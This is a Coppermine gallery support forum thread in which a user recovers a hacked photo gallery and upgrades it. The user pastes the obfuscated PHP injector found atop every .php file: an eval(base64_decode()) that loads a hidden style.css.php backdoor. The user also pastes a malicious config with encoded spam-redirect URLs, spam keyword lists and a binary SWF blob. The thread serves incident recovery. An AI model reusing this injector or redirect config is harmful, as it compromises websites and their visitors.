Error Upgrading hacked gallery 1.48 to 1.5x Error Upgrading hacked gallery 1.48 to 1.5x
 

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Main Menu

Error Upgrading hacked gallery 1.48 to 1.5x

Started by stoeby, January 24, 2011, 09:37:07 PM

Previous topic - Next topic

0 Members and 2 Guests are viewing this topic.

stoeby

I got the gallery (adminname and PW) half year ago, because the old admin could no longer do this and no one cared about it. http://www.turnabteilung-medienarchiv.de/cpg148/
I could not login to the admin-site. All picture and Albums have been there, but trying to login failed, due to the missing website. The URL was just gone. Tried to get support from hoster via email, no success. CPG was pretty new for me.
Now a month ago, also the whole gallery could not be opened: access denied...
calling the hosting-company, he told me it might be hacked, I should reinstall the gallery.
So I did. I still need the 2000 photos in about 20 Albums. On phpMyadmin it ist still available in Database. via FTP I did a backup of the folders of CPG148.

I followed Instructions on Upgrading from 1.4x to 1.5x.
(I was not able to identify running plugins or bridges)
put CPG folder via ftp on htdocs\cpg148 except \albums and \config.inc.php and ran update.php.
now, when starting http://www.turnabteilung-medienarchiv.de/cpg148/ I got following message: "fs: 254847 [need: 254668]". What does that mean?
So I tried to run install.php. I had to delete config.inc.php.
Although It told me to set register_globals=off. the host-Company I will call tomorrow for this.
I put back config.inc.php from the broken DUMP. but the error is the same.

At least I can not access the structure of 2000 Files and Albums. the backedup files without the structure are useless.
i would like to recreate the existing structure of the broken CPG 1.48 on a safe new CPG 1.5x. Any Idea???
If Any information is missing, I'll try to find it.

Addittionally I setup an install of cpg 1.5x on a separate folder.
http://www.turnabteilung-medienarchiv.de/Medienarchiv/
working fine. Maybe moving appropriate folders might help? copying the old \albums to the new \albums gave no success. Even not using the old config.inc.php.

Thx in advance


stoeby

Quote from: Joe Carver on January 25, 2011, 12:40:38 AM
See the thread: Yikes, I've been hacked! Now what?
Thank you very much, Joe!
While following all the steps in sanitizing my gallery folder, I recognized this one line in every 1st line of all *.php-files inside the top- and sub-folders. e.g. anycontent.php, config.php,...
"<?php /* <!-----hkycbJXRsBrtlTUKYvpF-----> */ $LjbMUSesTdur = base64_decode("JSVQQVRIJSUvJSVBRERQSFAlJQ==");  @include_once $LjbMUSesTdur;/* <!-----hkycbJXRsBrtlTUKYvpF-----> */?><?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy93ZWIvMS8wMDAvMDQzLzc3MC8xNjQwMTIvaHRkb2NzL2NwZzE0OC9hbGJ1bXMvdXNlcnBpY3MvMTAwMDEvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>
<?php"

I am not very familiar with php programming, but this line seems to be unusual there. Is this correct? Might this be the reason for my Problem? Or has this line no effect?
I have to decide, whether to clean all infected files (takes time) or to delete them. but I don't know if the Gallerystructure will be damaged by deleting all the files.

thx

stoeby

In case I have to decide for manual cleanup of every file, I have to clean the following. see attachment. But for me, most of these files in top-folder *\cpg148 (which is used here as working directory) seem unknown.
I dont know, whether these files are results of installed plugIns or bridges. I got the gallery as it is. Hacked! So probably some file have been put there by an intruder.
Should I just compare the folder with an actual 1.52 folder and delete all the unknown files listet in "WinMerge" (see attachment)???

stoeby

there are also unknown files in *albums\userpics\10001 (see attachment)! I will also delete them cause they look malicious
bi- file is a list of IP's.
cnf- file has following line: HR0cDovL3Vyb2R0ZHMud3MvaW4uY2dpPzIyJnBhcmFtZXRlcj0ka2V5d29yZCZzZT0kc2Umc2VvcmVmPSVyZWYlJkhUVFBfUkVGRVJFUj0lc2VsZl91cmwlJmRlZmF1bHRfa2V5d29yZD0la3cl"
ZGdzdQ== = "aHR0cDovL3Vyb2R0ZHMud3MvaW4uY2dpPzcmcGFyYW1ldGVyPSVrdyUmSFRUUF9SRUZFUkVSPSVzZWxmX3VybCU="
ZGd1aA== = "aHR0cDovL25vbXNhdDIyLm5ldC87aHR0cDovL25zc2F0Mi5jb20vO2h0dHA6Ly93cGxzYXQyMi5uZXQv"
ZGdpZA== = "ZWM1Y2U4NTktYmE5NC1jMDRjLTA0OWYtYzliMTZiNTc5YTkz"
ZGd0 = Mg==
cHJs = MA==
c3Q= = "UEhOMGVXeGxQaU5pZEhSa0lIdHdiM05wZEdsdmJqcGhZbk52YkhWMFpUdHZkbVZ5Wm14dmR6cGhkWFJ2TzJobGFXZG9kRG93TzNkcFpIUm9PakE3ZlR3dmMzUjViR1UrUEdadmJuUWdhV1E5SW1KMGRHUWlQZz09"
ZWQ= = "UEM5bWIyNTBQZz09"
bGJw = Mg==
ZGdibG8= = MQ==
ZnJi = MA==
ZGdzcg== = MQ==
ZGdzdA== = MjQ=
ZnI= = MA==
a3dy = MQ==
ZGd0aGVtZQ== = "Z29vZ2xlX3RyZW5kcw=="
Z2M= = ""
Z2Q= = MzA=
bWw= = NTA=
YXA= = "L2NwZzE0OC9pbmRleC5waHAv"
c2Rs = MA==
Z3o= = MA==

csi-file: "89.74.155.71|1273941107"
kwd-file: "prom hairstyles"
lb-file: empty
lock-file: empty
rlf-file: 15-05-2010 - 126-12-2010 - 1
skwd-file has list of keywords like this: "tramadol
blackjack
craps
onlinecasino
propecia
..."

swf-file: "CWS   Ú  xœmÒÛNQÆñÿÌéâ¤à¥U'ƒP9µœÏ+Ñ'àÄ¡Œ¡0-u:¨$\pé•—sáCÀ+ù&uJ¸'¬¬dïßÞ;Y+ù®ð¯Àû Ÿ†É×G¿Óéгç®üºa‡4j´h·âzÊÉY½Éyó=L*|CÇh§ÉAµâ°ñýB,,Ž" ¤h... ô3çèu´Ì:M !D8BçøŠV9F/9A·8E׉Ñ
~¢³ÔÐyÑ=šè6
t7oJ—ØD—Y@W˜BW™Dáwõ¿ŽAÿ8¼h§aí׌¢£8»»oDÍ4ÿ
"®àåó¾xû¥¬—À»= ÅÌGüýÝ,@œÅR&ÝÍéWÌ
\÷YaçÎEzMï"~ÓdÐô‡òÈô!6ý±<1ý©<3ý¹¼0}D^šþJFM/JÉô×òÆô·2fú;7}B&MŸ'÷¦OËŒéeù`ú¬Ì™>/ ¦/JÅôª,™¾,+¦¯Êšéë²aú¦lÝ÷<—î6ÛºQÕ¼þ"â}»
"

Αndré

Quote from: stoeby on January 25, 2011, 12:17:01 PM
I have to decide, whether to clean all infected files (takes time) or to delete them. but I don't know if the Gallerystructure will be damaged by deleting all the files.
Instead of manual cleaning core files, you should replace them with fresh copies of the latest Coppermine release (as described in the upgrade docs).

stoeby

Quote from: Αndré on January 25, 2011, 02:24:57 PM
Instead of manual cleaning core files, you should replace them with fresh copies of the latest Coppermine release (as described in the upgrade docs).
Yes, so I did.
After sanatizing der hacked gallery following instructions from here: http://forum.coppermine-gallery.net/index.php/topic,51927.0.html Yikes, I've been hacked! Now what?,
and Upgrading the cleaned Folder folliwing instructions from here: http://documentation.coppermine-gallery.net/en/upgrading.htm,

I have all the Folders an Photos (the structure) available again. Still need to harden the gallery against new attacks.
5 Hours santizing time saved me abaout 10 days of creation time for a new structure.
Thank you very much.

SOLVED!!!